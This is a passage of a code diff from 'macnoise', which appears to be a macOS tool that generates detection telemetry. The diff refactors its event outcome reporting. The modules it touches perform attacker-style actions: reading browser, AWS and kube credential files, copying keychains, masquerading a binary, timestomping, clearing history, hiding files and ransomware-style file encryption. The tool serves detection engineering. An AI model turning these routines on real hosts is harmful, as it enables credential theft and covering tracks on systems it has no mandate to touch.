 	if !errors.Is(err, context.Canceled) || len(events) != 1 || events[0].EventType != "file_timestomp" {
 		t.Fatalf("Generate = %v, events = %+v", err, events)

--- a/modules/evasion/log_clear_test.go
+++ b/modules/evasion/log_clear_test.go
@@ -19,7 +19,7 @@ func TestTimestomp_ChangesMtime(t *testing.T) {
 	if ev.EventType != "file_timestomp" {
 		t.Fatalf("event type = %q, want file_timestomp", ev.EventType)
 	}
-	if !ev.Success {
+	if ev.Outcome != module.OutcomeExecuted {
 		t.Fatalf("timestomp reported failure: %s", ev.Message)
 	}
 
@@ -36,7 +36,7 @@ func TestTimestomp_ChangesMtime(t *testing.T) {
 func TestTimestomp_BadPath(t *testing.T) {
 	info := (&evadeLogClear{}).Info()
 	ev := timestomp(info, filepath.Join(t.TempDir(), "no", "such", "dir", "file"))
-	if ev.Success {
+	if ev.Outcome != module.OutcomeError {
 		t.Error("expected failure for nonexistent parent dir")
 	}
 }
@@ -49,7 +49,7 @@ func TestClearHistory_RemovesFile(t *testing.T) {
 	if ev.EventType != "history_clear" {
 		t.Fatalf("event type = %q, want history_clear", ev.EventType)
 	}
-	if !ev.Success {
+	if ev.Outcome != module.OutcomeExecuted {
 		t.Fatalf("history clear reported failure: %s", ev.Message)
 	}
 

--- a/modules/evasion/masquerade.go
+++ b/modules/evasion/masquerade.go
@@ -87,23 +87,25 @@ func (e *evadeMasquerade) Generate(ctx context.Context, params module.Params, em
 	e.stageDir = stageDir
 	destPath := filepath.Join(stageDir, masqName)
 
-	copyEv := output.NewEvent(info, "masquerade_copy", false,
+	copyEv := output.NewEvent(info, "masquerade_copy", module.OutcomeError, module.File(destPath),
 		fmt.Sprintf("copying %s to %s (masquerading as %q)", source, destPath, masqName))
 	if err := copyExecutable(source, destPath); err != nil {
 		copyEv = output.WithError(copyEv, err)
-		emit(copyEv)
-		return nil
+		return emit(copyEv)
 	}
-	copyEv.Success = true
+	copyEv.Outcome = module.OutcomeExecuted
 	copyEv.Message = fmt.Sprintf("staged %s as %s", source, destPath)
 	copyEv = output.WithDetails(copyEv, map[string]any{
 		"source":         source,
 		"path":           destPath,
 		"masqueraded_as": masqName,
 	})
-	emit(copyEv)
+	if err := emit(copyEv); err != nil {
+		return err
+	}
 
-	execEv := output.NewEvent(info, "masquerade_exec", false,
+	execEv := output.NewEvent(info, "masquerade_exec", module.OutcomeError,
+		module.Process(filepath.Base(destPath), destPath, destPath, 0),
 		fmt.Sprintf("executing %s under masquerading name %q", destPath, masqName))
 	out, err := exec.CommandContext(ctx, destPath).CombinedOutput()
 	if err != nil {
@@ -118,7 +120,7 @@ func (e *evadeMasquerade) Generate(ctx context.Context, params module.Params, em
 			"output":         strings.TrimSpace(string(out)),
 		})
 	} else {
-		execEv.Success = true
+		execEv.Outcome = module.OutcomeExecuted
 		execEv.Message = fmt.Sprintf("ran %s as %q (real binary: %s)", destPath, masqName, source)
 		execEv = output.WithDetails(execEv, map[string]any{
 			"path":           destPath,
@@ -126,8 +128,7 @@ func (e *evadeMasquerade) Generate(ctx context.Context, params module.Params, em
 			"real_source":    source,
 		})
 	}
-	emit(execEv)
-	return nil
+	return emit(execEv)
 }
 
 func (e *evadeMasquerade) DryRun(params module.Params) []string {

--- a/modules/evasion/masquerade_integration_test.go
+++ b/modules/evasion/masquerade_integration_test.go
@@ -17,7 +17,7 @@ func TestMasqueradeGenerate_CopiesAndExecutes(t *testing.T) {
 	stage := filepath.Join(t.TempDir(), "mq")
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 	e := &evadeMasquerade{}
 	ctx := module.ContextWithRunID(context.Background(), "mqrun5")
 	params := module.Params{"stage_dir": stage, "masquerade_name": "com.apple.WindowServer"}
@@ -32,11 +32,11 @@ func TestMasqueradeGenerate_CopiesAndExecutes(t *testing.T) {
 	if events[0].EventType != "masquerade_copy" || events[1].EventType != "masquerade_exec" {
 		t.Fatalf("event types = %q,%q; want masquerade_copy,masquerade_exec", events[0].EventType, events[1].EventType)
 	}
-	if !events[0].Success {
+	if events[0].Outcome != module.OutcomeExecuted {
 		t.Fatalf("copy failed: %s", events[0].Message)
 	}
 	// A copy of /usr/bin/true exits 0, so the masqueraded exec should succeed.
-	if !events[1].Success {
+	if events[1].Outcome != module.OutcomeExecuted {
 		t.Errorf("masqueraded exec failed: %s", events[1].Message)
 	}
 	if events[1].Details["masqueraded_as"] != "com.apple.WindowServer" {

--- a/modules/file/archive.go
+++ b/modules/file/archive.go
@@ -2,6 +2,7 @@ package file
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os"
 	"os/exec"
@@ -53,10 +54,10 @@ func (f *fileArchive) Generate(ctx context.Context, params module.Params, emit m
 	info := f.Info()
 
 	if !prereqs.HasCommand(tool) {
-		ev := output.NewEvent(info, "archive_create", false, fmt.Sprintf("required tool %q not found in PATH", tool))
-		ev = output.WithError(ev, fmt.Errorf("command not found: %s", tool))
-		emit(ev)
-		return fmt.Errorf("command not found: %s", tool)
+		err := fmt.Errorf("command not found: %s", tool)
+		ev := output.NewEvent(info, "archive_create", module.OutcomeError, module.File(outputPath), fmt.Sprintf("required tool %q not found in PATH", tool))
+		ev = output.WithError(ev, err)
+		return errors.Join(err, emit(ev))
 	}
 
 	if err := os.MkdirAll(sourceDir, 0o755); err != nil {
@@ -80,12 +81,11 @@ func (f *fileArchive) Generate(ctx context.Context, params module.Params, emit m
 		archiveCmd = exec.CommandContext(ctx, "zip", "-r", outputPath, sourceDir)
 	}
 
-	ev := output.NewEvent(info, "archive_create", false, fmt.Sprintf("archiving %s → %s via %s", sourceDir, outputPath, tool))
+	ev := output.NewEvent(info, "archive_create", module.OutcomeError, module.File(outputPath), fmt.Sprintf("archiving %s → %s via %s", sourceDir, outputPath, tool))
 	archiveOut, archiveErr := archiveCmd.CombinedOutput()
 	if archiveErr != nil {
 		ev = output.WithError(ev, fmt.Errorf("%v: %s", archiveErr, archiveOut))
-		emit(ev)
-		return archiveErr
+		return errors.Join(archiveErr, emit(ev))
 	}
 
 	var archiveSize int64
@@ -93,7 +93,7 @@ func (f *fileArchive) Generate(ctx context.Context, params module.Params, emit m
 		archiveSize = fi.Size()
 	}
 
-	ev.Success = true
+	ev.Outcome = module.OutcomeExecuted
 	ev.Message = fmt.Sprintf("archive created: %s (%d bytes) via %s", outputPath, archiveSize, tool)
 	ev = output.WithDetails(ev, map[string]any{
 		"source_dir":   sourceDir,
@@ -101,8 +101,7 @@ func (f *fileArchive) Generate(ctx context.Context, params module.Params, emit m
 		"tool":         tool,
 		"archive_size": archiveSize,
 	})
-	emit(ev)
-	return nil
+	return emit(ev)
 }
 
 func (f *fileArchive) DryRun(params module.Params) []string {

--- a/modules/file/archive_test.go
+++ b/modules/file/archive_test.go
@@ -17,7 +17,7 @@ func TestFileArchive_GenerateAndCleanup(t *testing.T) {
 	outputPath := filepath.Join(dir, "out.zip")
 	f := &fileArchive{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 
 	params := module.Params{"source_dir": sourceDir, "output_path": outputPath, "tool": "zip"}
 	if err := f.Generate(context.Background(), params, emit); err != nil {
@@ -34,7 +34,7 @@ func TestFileArchive_GenerateAndCleanup(t *testing.T) {
 
 	var sawSuccess bool
 	for _, ev := range events {
-		if ev.EventType == "archive_create" && ev.Success {
+		if ev.EventType == "archive_create" && ev.Outcome == module.OutcomeExecuted {
 			sawSuccess = true
 		}
 	}

--- a/modules/file/browser_creds.go
+++ b/modules/file/browser_creds.go
@@ -206,7 +206,7 @@ func (f *fileBrowserCreds) Generate(ctx context.Context, params module.Params, e
 			var ev module.TelemetryEvent
 			switch {
 			case os.IsNotExist(readErr) || errors.Is(readErr, errNotRegularFile):
-				ev = output.NewEvent(info, "browser_cred_probe", true,
+				ev = output.NewEvent(info, "browser_cred_probe", module.OutcomeIndeterminate, module.File(path),
 					fmt.Sprintf("%s credential path not present: %s", browser.name, path))
 				// An absent path means no read was attempted and no access
 				// decision was made, the same distinction the TCC probes draw.
@@ -222,7 +222,7 @@ func (f *fileBrowserCreds) Generate(ctx context.Context, params module.Params, e
 				// usually means TCC denied it. That refusal is the signal a
 				// detection is meant to see, so it is reported as a completed
 				// read attempt rather than a module failure.
-				ev = output.NewEvent(info, "browser_cred_read", true,
+				ev = output.NewEvent(info, "browser_cred_read", module.OutcomeDenied, module.File(path),
 					fmt.Sprintf("%s credential file read denied: %s", browser.name, path))
 				ev = output.WithOutcome(ev, module.OutcomeDenied, readErr)
 				ev = output.WithDetails(ev, map[string]any{
@@ -233,7 +233,7 @@ func (f *fileBrowserCreds) Generate(ctx context.Context, params module.Params, e
 				})
 
 			default:
-				ev = output.NewEvent(info, "browser_cred_read", true,
+				ev = output.NewEvent(info, "browser_cred_read", module.OutcomeExecuted, module.File(path),
 					fmt.Sprintf("%s credential file read: %s (%d bytes)", browser.name, path, n))
 				ev = output.WithDetails(ev, map[string]any{
 					"browser":    browser.name,
@@ -243,7 +243,9 @@ func (f *fileBrowserCreds) Generate(ctx context.Context, params module.Params, e
 					"bytes_read": n,
 				})
 			}
-			emit(ev)
+			if err := emit(ev); err != nil {
+				return err
+			}
 		}
 	}
 	return nil

--- a/modules/file/browser_creds_test.go
+++ b/modules/file/browser_creds_test.go
@@ -11,6 +11,13 @@ import (
 	"github.com/0xv1n/macnoise/pkg/module"
 )
 
+func captureBrowserEvents(events *[]module.TelemetryEvent) module.EventEmitter {
+	return func(ev module.TelemetryEvent) error {
+		*events = append(*events, ev)
+		return nil
+	}
+}
+
 // writeCredFixture creates path and its parents with the given contents.
 func writeCredFixture(t *testing.T, path, contents string) {
 	t.Helper()
@@ -44,7 +51,7 @@ func TestBrowserCreds_ReadsRealFiles(t *testing.T) {
 
 	f := &fileBrowserCreds{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureBrowserEvents(&events)
 
 	if err := f.Generate(context.Background(), module.Params{"browsers": "chrome"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -71,7 +78,7 @@ func TestBrowserCreds_MissingPathIsProbeNotRead(t *testing.T) {
 
 	f := &fileBrowserCreds{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureBrowserEvents(&events)
 
 	if err := f.Generate(context.Background(), module.Params{"browsers": "chrome"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -107,7 +114,7 @@ func TestBrowserCreds_UnreadableFileIsDeniedRead(t *testing.T) {
 
 	f := &fileBrowserCreds{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureBrowserEvents(&events)
 
 	if err := f.Generate(context.Background(), module.Params{"browsers": "safari"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -126,8 +133,8 @@ func TestBrowserCreds_UnreadableFileIsDeniedRead(t *testing.T) {
 	if ev.Error == "" {
 		t.Error("expected the denial reason to be recorded in Error")
 	}
-	if !ev.Success {
-		t.Error("Success = false, want true: a denied read is expected telemetry, not a module failure")
+	if ev.Outcome != module.OutcomeDenied {
+		t.Errorf("Outcome = %q, want denied", ev.Outcome)
 	}
 }
 
@@ -149,7 +156,7 @@ func TestBrowserCreds_EnumeratesChromiumProfiles(t *testing.T) {
 
 	f := &fileBrowserCreds{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureBrowserEvents(&events)
 
 	if err := f.Generate(context.Background(), module.Params{"browsers": "chrome"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -178,10 +185,11 @@ func TestBrowserCreds_CoversAllChromiumFamilies(t *testing.T) {
 
 	f := &fileBrowserCreds{}
 	seen := map[string]bool{}
-	emit := func(ev module.TelemetryEvent) {
+	emit := func(ev module.TelemetryEvent) error {
 		if b, ok := ev.Details["browser"].(string); ok {
 			seen[b] = true
 		}
+		return nil
 	}
 
 	if err := f.Generate(context.Background(), module.Params{}, emit); err != nil {
@@ -208,7 +216,7 @@ func TestBrowserCreds_EnumeratesFirefoxProfiles(t *testing.T) {
 
 	f := &fileBrowserCreds{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureBrowserEvents(&events)
 
 	if err := f.Generate(context.Background(), module.Params{"browsers": "firefox"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -235,7 +243,7 @@ func TestBrowserCreds_AbsentFirefoxStillProbes(t *testing.T) {
 
 	f := &fileBrowserCreds{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureBrowserEvents(&events)
 
 	if err := f.Generate(context.Background(), module.Params{"browsers": "firefox"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -261,7 +269,7 @@ func TestBrowserCreds_DirectoryTargetIsProbe(t *testing.T) {
 
 	f := &fileBrowserCreds{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := captureBrowserEvents(&events)
 
 	if err := f.Generate(context.Background(), module.Params{"browsers": "chrome"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)

--- a/modules/file/create.go
+++ b/modules/file/create.go
@@ -4,6 +4,7 @@ package file
 
 import (
 	"context"
+	"errors"
 	"fmt"
 	"os"
 	"path/filepath"
@@ -65,10 +66,9 @@ func (f *fileCreate) Generate(ctx context.Context, params module.Params, emit mo
 	info := f.Info()
 
 	if err := os.MkdirAll(baseDir, 0o755); err != nil {
-		ev := output.NewEvent(info, "dir_create", false, fmt.Sprintf("failed to create directory %s", baseDir))
+		ev := output.NewEvent(info, "dir_create", module.OutcomeError, module.File(baseDir), fmt.Sprintf("failed to create directory %s", baseDir))
 		ev = output.WithError(ev, err)
-		emit(ev)
-		return err
+		return errors.Join(err, emit(ev))
 	}
 
 	if filename != "" {
@@ -95,17 +95,21 @@ func (f *fileCreate) Generate(ctx context.Context, params module.Params, emit mo
 			fileContent = fmt.Sprintf("MacNoise telemetry file %d created at %s\n", i, time.Now().UTC())
 		}
 
-		ev := output.NewEvent(info, "file_create", false, fmt.Sprintf("creating %s", fpath))
+		ev := output.NewEvent(info, "file_create", module.OutcomeError, module.File(fpath), fmt.Sprintf("creating %s", fpath))
 		if err := os.WriteFile(fpath, []byte(fileContent), 0o644); err != nil {
 			ev = output.WithError(ev, err)
-			emit(ev)
+			if emitErr := emit(ev); emitErr != nil {
+				return emitErr
+			}
 			continue
 		}
 		f.createdPaths = append(f.createdPaths, fpath)
-		ev.Success = true
+		ev.Outcome = module.OutcomeExecuted
 		ev.Message = fmt.Sprintf("created %s (%d bytes)", fpath, len(fileContent))
 		ev = output.WithDetails(ev, map[string]any{"path": fpath, "size": len(fileContent)})
-		emit(ev)
+		if err := emit(ev); err != nil {
+			return err
+		}
 	}
 	return nil
 }

--- a/modules/file/create_named_test.go
+++ b/modules/file/create_named_test.go
@@ -19,7 +19,7 @@ func TestFileCreate_GenerateNamedFile(t *testing.T) {
 		"count":    "99",
 		"prefix":   "ignored_",
 	}
-	if err := f.Generate(context.Background(), params, func(module.TelemetryEvent) {}); err != nil {
+	if err := f.Generate(context.Background(), params, noopEmit); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
 
@@ -52,7 +52,7 @@ func TestFileCreate_RejectsNestedFilename(t *testing.T) {
 	err := f.Generate(context.Background(), module.Params{
 		"base_dir": t.TempDir(),
 		"filename": "nested/RECOVER_YOUR_FILES.txt",
-	}, func(module.TelemetryEvent) {})
+	}, noopEmit)
 	if err == nil {
 		t.Fatal("Generate succeeded with a nested filename")
 	}

--- a/modules/file/create_test.go
+++ b/modules/file/create_test.go
@@ -14,7 +14,7 @@ func TestFileCreate_GenerateAndCleanup(t *testing.T) {
 	dir := t.TempDir()
 	f := &fileCreate{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 
 	params := module.Params{"base_dir": dir, "count": "3", "prefix": "it_"}
 	if err := f.Generate(context.Background(), params, emit); err != nil {
@@ -31,7 +31,7 @@ func TestFileCreate_GenerateAndCleanup(t *testing.T) {
 
 	successCount := 0
 	for _, ev := range events {
-		if ev.EventType == "file_create" && ev.Success {
+		if ev.EventType == "file_create" && ev.Outcome == module.OutcomeExecuted {
 			successCount++
 		}
 	}

--- a/modules/file/cred_files.go
+++ b/modules/file/cred_files.go
@@ -118,7 +118,9 @@ func (f *fileCredFiles) Generate(ctx context.Context, params module.Params, emit
 			return ctx.Err()
 		default:
 		}
-		emit(credEvent(info, target))
+		if err := emit(credEvent(info, target)); err != nil {
+			return err
+		}
 	}
 	return nil
 }
@@ -132,7 +134,7 @@ func credEvent(info module.ModuleInfo, target credTarget) module.TelemetryEvent 
 
 	switch {
 	case os.IsNotExist(readErr) || errors.Is(readErr, errNotRegularFile):
-		ev := output.NewEvent(info, "cred_file_probe", true,
+		ev := output.NewEvent(info, "cred_file_probe", module.OutcomeIndeterminate, module.File(target.path),
 			fmt.Sprintf("%s not present: %s", target.kind, target.path))
 		// Absent target: nothing was read and no access decision was made, the
 		// same distinction the TCC probes and browser_creds draw.
@@ -148,7 +150,7 @@ func credEvent(info module.ModuleInfo, target credTarget) module.TelemetryEvent 
 		// signal a detection wants, not a module failure, so it is reported as
 		// a completed, refused read attempt. os.Open, not os.Stat, is what
 		// draws this line: Stat succeeds on a file the caller cannot open.
-		ev := output.NewEvent(info, "cred_file_read", true,
+		ev := output.NewEvent(info, "cred_file_read", module.OutcomeDenied, module.File(target.path),
 			fmt.Sprintf("%s read denied: %s", target.kind, target.path))
 		ev = output.WithOutcome(ev, module.OutcomeDenied, readErr)
 		return output.WithDetails(ev, map[string]any{
@@ -159,7 +161,7 @@ func credEvent(info module.ModuleInfo, target credTarget) module.TelemetryEvent 
 		})
 
 	default:
-		ev := output.NewEvent(info, "cred_file_read", true,
+		ev := output.NewEvent(info, "cred_file_read", module.OutcomeExecuted, module.File(target.path),
 			fmt.Sprintf("%s read: %s (%d bytes)", target.kind, target.path, n))
 		return output.WithDetails(ev, map[string]any{
 			"kind":       target.kind,

--- a/modules/file/cred_files_integration_test.go
+++ b/modules/file/cred_files_integration_test.go
@@ -33,8 +33,8 @@ func TestCredFiles_UnreadableFileIsDeniedRead(t *testing.T) {
 	if ev.Outcome != module.OutcomeDenied {
 		t.Errorf("outcome = %q, want denied", ev.Outcome)
 	}
-	if !ev.Success {
-		t.Error("Success = false: a permission denial is expected telemetry, not a macnoise fault")
+	if ev.Outcome != module.OutcomeDenied {
+		t.Errorf("Outcome = %q, want denied", ev.Outcome)
 	}
 	if ev.Details["accessible"] != false {
 		t.Errorf("accessible = %v, want false", ev.Details["accessible"])
@@ -57,7 +57,7 @@ func TestCredFiles_GenerateOverTempHome(t *testing.T) {
 	}
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 	if err := (&fileCredFiles{}).Generate(context.Background(), module.Params{}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
 	}
@@ -68,8 +68,8 @@ func TestCredFiles_GenerateOverTempHome(t *testing.T) {
 		path, _ := ev.Details["path"].(string)
 		switch {
 		case kind == "aws_credentials" && path == awsCreds:
-			if ev.EventType != "cred_file_read" || ev.ResolvedOutcome() != module.OutcomeExecuted {
-				t.Errorf("aws credentials: type %q outcome %q, want cred_file_read/executed", ev.EventType, ev.ResolvedOutcome())
+			if ev.EventType != "cred_file_read" || ev.Outcome != module.OutcomeExecuted {
+				t.Errorf("aws credentials: type %q outcome %q, want cred_file_read/executed", ev.EventType, ev.Outcome)
 			}
 			sawAWSRead = true
 		case kind == "kube_config":

--- a/modules/file/cred_files_test.go
+++ b/modules/file/cred_files_test.go
@@ -107,9 +107,7 @@ func TestCredEventReadsPresentFile(t *testing.T) {
 	if ev.EventType != "cred_file_read" {
 		t.Errorf("event type = %q, want cred_file_read", ev.EventType)
 	}
-	// The read path leaves Outcome unset by design; it resolves to executed at
-	// the emitter boundary from Success, the same as browser_creds.
-	if got := ev.ResolvedOutcome(); got != module.OutcomeExecuted {
+	if got := ev.Outcome; got != module.OutcomeExecuted {
 		t.Errorf("resolved outcome = %q, want executed", got)
 	}
 	if ev.Details["bytes_read"] != int64(len(content)) {
@@ -132,8 +130,8 @@ func TestCredEventAbsentTargetIsIndeterminate(t *testing.T) {
 	if ev.Outcome != module.OutcomeIndeterminate {
 		t.Errorf("outcome = %q, want indeterminate", ev.Outcome)
 	}
-	if !ev.Success {
-		t.Error("Success = false; an absent target is a valid observation")
+	if ev.Outcome != module.OutcomeIndeterminate {
+		t.Errorf("Outcome = %q, want indeterminate", ev.Outcome)
 	}
 	if ev.Details["exists"] != false {
 		t.Errorf("exists = %v, want false", ev.Details["exists"])

--- a/modules/file/encrypt.go
+++ b/modules/file/encrypt.go
@@ -149,21 +149,25 @@ func (f *fileEncrypt) Generate(ctx context.Context, params module.Params, emit m
 			return ctx.Err()
 		default:
 		}
-		ev := output.NewEvent(info, "file_encrypt", false, fmt.Sprintf("encrypting %s", p))
+		ev := output.NewEvent(info, "file_encrypt", module.OutcomeError, module.File(p+extension), fmt.Sprintf("encrypting %s", p))
 		encPath, encErr := encryptFile(p, extension, key)
 		if encErr != nil {
 			ev = output.WithError(ev, encErr)
-			emit(ev)
+			if emitErr := emit(ev); emitErr != nil {
+				return emitErr
+			}
 			continue
 		}
-		ev.Success = true
+		ev.Outcome = module.OutcomeExecuted
 		ev.Message = fmt.Sprintf("encrypted %s -> %s", p, encPath)
 		ev = output.WithDetails(ev, map[string]any{
 			"original":  p,
 			"encrypted": encPath,
 			"cipher":    "AES-256-GCM",
 		})
-		emit(ev)
+		if err := emit(ev); err != nil {
+			return err
+		}
 	}
 	return nil
 }

--- a/modules/file/encrypt_test.go
+++ b/modules/file/encrypt_test.go
@@ -105,7 +105,7 @@ func TestGenerate_StagesThenEncryptsAll(t *testing.T) {
 	stage := filepath.Join(t.TempDir(), "enc")
 
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 	f := &fileEncrypt{}
 	if err := f.Generate(context.Background(), module.Params{"stage_dir": stage, "file_count": "4"}, emit); err != nil {
 		t.Fatalf("Generate: %v", err)
@@ -116,7 +116,7 @@ func TestGenerate_StagesThenEncryptsAll(t *testing.T) {
 		switch ev.EventType {
 		case "file_encrypt":
 			encEvents++
-			if !ev.Success {
+			if ev.Outcome != module.OutcomeExecuted {
 				t.Errorf("file_encrypt failed: %s", ev.Message)
 			}
 			original, _ := ev.Details["original"].(string)

--- a/modules/file/hide.go
+++ b/modules/file/hide.go
@@ -56,30 +56,30 @@ func (f *fileHide) Generate(ctx context.Context, params module.Params, emit modu
 
 	chflagsTarget := filepath.Join(workDir, "visible_file.txt")
 	if err := os.WriteFile(chflagsTarget, []byte("macnoise chflags hidden test\n"), 0o644); err == nil {
-		chflagsEv := output.NewEvent(info, "file_hide_chflags", false, fmt.Sprintf("hiding %s via chflags", chflagsTarget))
+		chflagsEv := output.NewEvent(info, "file_hide_chflags", module.OutcomeError, module.File(chflagsTarget), fmt.Sprintf("hiding %s via chflags", chflagsTarget))
 		chflagsOut, chflagsErr := exec.CommandContext(ctx, "chflags", "hidden", chflagsTarget).CombinedOutput()
 		if chflagsErr != nil {
 			chflagsEv = output.WithError(chflagsEv, fmt.Errorf("%v: %s", chflagsErr, chflagsOut))
 		} else {
-			chflagsEv.Success = true
+			chflagsEv.Outcome = module.OutcomeExecuted
 			chflagsEv.Message = fmt.Sprintf("file hidden via chflags: %s", chflagsTarget)
 			chflagsEv = output.WithDetails(chflagsEv, map[string]any{"path": chflagsTarget, "method": "chflags hidden"})
 		}
-		emit(chflagsEv)
+		if err := emit(chflagsEv); err != nil {
+			return err
+		}
 	}
 
 	dotTarget := filepath.Join(workDir, ".macnoise_hidden")
-	dotEv := output.NewEvent(info, "file_hide_dotfile", false, fmt.Sprintf("creating dotfile: %s", dotTarget))
+	dotEv := output.NewEvent(info, "file_hide_dotfile", module.OutcomeError, module.File(dotTarget), fmt.Sprintf("creating dotfile: %s", dotTarget))
 	if err := os.WriteFile(dotTarget, []byte("macnoise dotfile hidden test\n"), 0o644); err != nil {
 		dotEv = output.WithError(dotEv, err)
 	} else {
-		dotEv.Success = true
+		dotEv.Outcome = module.OutcomeExecuted
 		dotEv.Message = fmt.Sprintf("dotfile created: %s", dotTarget)
 		dotEv = output.WithDetails(dotEv, map[string]any{"path": dotTarget, "method": "dotfile"})
 	}
-	emit(dotEv)
-
-	return nil
+	return emit(dotEv)
 }
 
 func (f *fileHide) DryRun(params module.Params) []string {

--- a/modules/file/hide_test.go
+++ b/modules/file/hide_test.go
@@ -15,7 +15,7 @@ func TestFileHide_GenerateAndCleanup(t *testing.T) {
 	workDir := filepath.Join(t.TempDir(), "hide")
 	f := &fileHide{}
 	var events []module.TelemetryEvent
-	emit := func(ev module.TelemetryEvent) { events = append(events, ev) }
+	emit := func(ev module.TelemetryEvent) error { events = append(events, ev); return nil }
 
 	params := module.Params{"work_dir": workDir}
 	if err := f.Generate(context.Background(), params, emit); err != nil {
@@ -33,9 +33,9 @@ func TestFileHide_GenerateAndCleanup(t *testing.T) {
 	for _, ev := range events {
 		switch ev.EventType {
 		case "file_hide_chflags":
-			sawChflags = sawChflags || ev.Success
+			sawChflags = sawChflags || ev.Outcome == module.OutcomeExecuted
 		case "file_hide_dotfile":
-			sawDotfile = sawDotfile || ev.Success
+			sawDotfile = sawDotfile || ev.Outcome == module.OutcomeExecuted
 		}
 	}
 	if !sawChflags {

--- a/modules/file/keychain_copy.go
+++ b/modules/file/keychain_copy.go
@@ -161,7 +161,7 @@ func keychainEvents(info module.ModuleInfo, t keychainTarget, dst string) []modu
 		// macnoise could not write the copy. Nothing about the host's handling
 		// of the keychain can be concluded from that, so it is reported as the
 		// tool fault it is rather than as a read result.
-		ev := output.NewEvent(info, "keychain_copy", false,
+		ev := output.NewEvent(info, "keychain_copy", module.OutcomeError, module.File(dst),
 			fmt.Sprintf("staging %s to %s failed", t.kind, dst))
 		ev = output.WithDetails(ev, map[string]any{
 			"kind":        t.kind,
@@ -173,7 +173,7 @@ func keychainEvents(info module.ModuleInfo, t keychainTarget, dst string) []modu
 	case os.IsNotExist(err):
 		// Absent store: nothing was read and no access decision was made, the
 		// same distinction cred_files and the TCC probes draw.
-		ev := output.NewEvent(info, "keychain_read", true,
+		ev := output.NewEvent(info, "keychain_read", module.OutcomeIndeterminate, module.File(t.path),
 			fmt.Sprintf("%s not present: %s", t.kind, t.path))
 		ev = output.WithOutcome(ev, module.OutcomeIndeterminate, nil)
 		return []module.TelemetryEvent{output.WithDetails(ev, map[string]any{
@@ -186,7 +186,7 @@ func keychainEvents(info module.ModuleInfo, t keychainTarget, dst string) []modu
 		// The store exists but could not be opened. That refusal is the signal a
 		// detection keys on, not a module failure, so it is a completed and
 		// refused read rather than an error.
-		ev := output.NewEvent(info, "keychain_read", true,
+		ev := output.NewEvent(info, "keychain_read", module.OutcomeDenied, module.File(t.path),
 			fmt.Sprintf("%s read denied: %s", t.kind, t.path))
 		ev = output.WithOutcome(ev, module.OutcomeDenied, err)
 		return []module.TelemetryEvent{output.WithDetails(ev, map[string]any{
@@ -202,7 +202,7 @@ func keychainEvents(info module.ModuleInfo, t keychainTarget, dst string) []modu
 		// what it actually was. Both matter to a consumer: the read of a
 		// keychain is the credential access, and a keychain-shaped file
 		// appearing in a staging directory is the collection.
-		readEv := output.NewEvent(info, "keychain_read", true,
+		readEv := output.NewEvent(info, "keychain_read", module.OutcomeExecuted, module.File(t.path),
 			fmt.Sprintf("%s read: %s (%d bytes)", t.kind, t.path, n))
 		readEv = output.WithDetails(readEv, map[string]any{
 			"kind":       t.kind,
@@ -212,7 +212,7 @@ func keychainEvents(info module.ModuleInfo, t keychainTarget, dst string) []modu
 			"bytes_read": n,
 		})
 
-		copyEv := output.NewEvent(info, "keychain_copy", true,
+		copyEv := output.NewEvent(info, "keychain_copy", module.OutcomeExecuted, module.File(dst),
 			fmt.Sprintf("%s staged to %s (%d bytes)", t.kind, dst, n))
 		copyEv = output.WithDetails(copyEv, map[string]any{
 			"kind":         t.kind,
@@ -248,7 +248,9 @@ func (f *fileKeychainCopy) Generate(ctx context.Context, params module.Params, e
 		default:
 		}
 		for _, ev := range keychainEvents(info, target, filepath.Join(stageDir, names[i])) {
-			emit(ev)
+			if err := emit(ev); err != nil {
+				return err
+			}
 		}
 	}
 	return nil

--- a/modules/file/keychain_copy_integration_test.go
+++ b/modules/file/keychain_copy_integration_test.go
@@ -38,8 +38,8 @@ func TestKeychainCopy_UnreadableKeychainIsDenied(t *testing.T) {
 	if evs[0].Outcome != module.OutcomeDenied {
 		t.Errorf("outcome = %q, want denied", evs[0].Outcome)
 	}
-	if !evs[0].Success {
-		t.Error("Success = false: a permission denial is expected telemetry, not a macnoise fault")
+	if evs[0].Outcome != module.OutcomeDenied {
+		t.Errorf("Outcome = %q, want denied", evs[0].Outcome)
 	}
 	if _, err := os.Stat(dst); !os.IsNotExist(err) {
 		t.Error("a staged copy was created from a keychain that could not be read")
@@ -67,7 +67,7 @@ func TestKeychainCopy_GenerateStagesRealCopy(t *testing.T) {
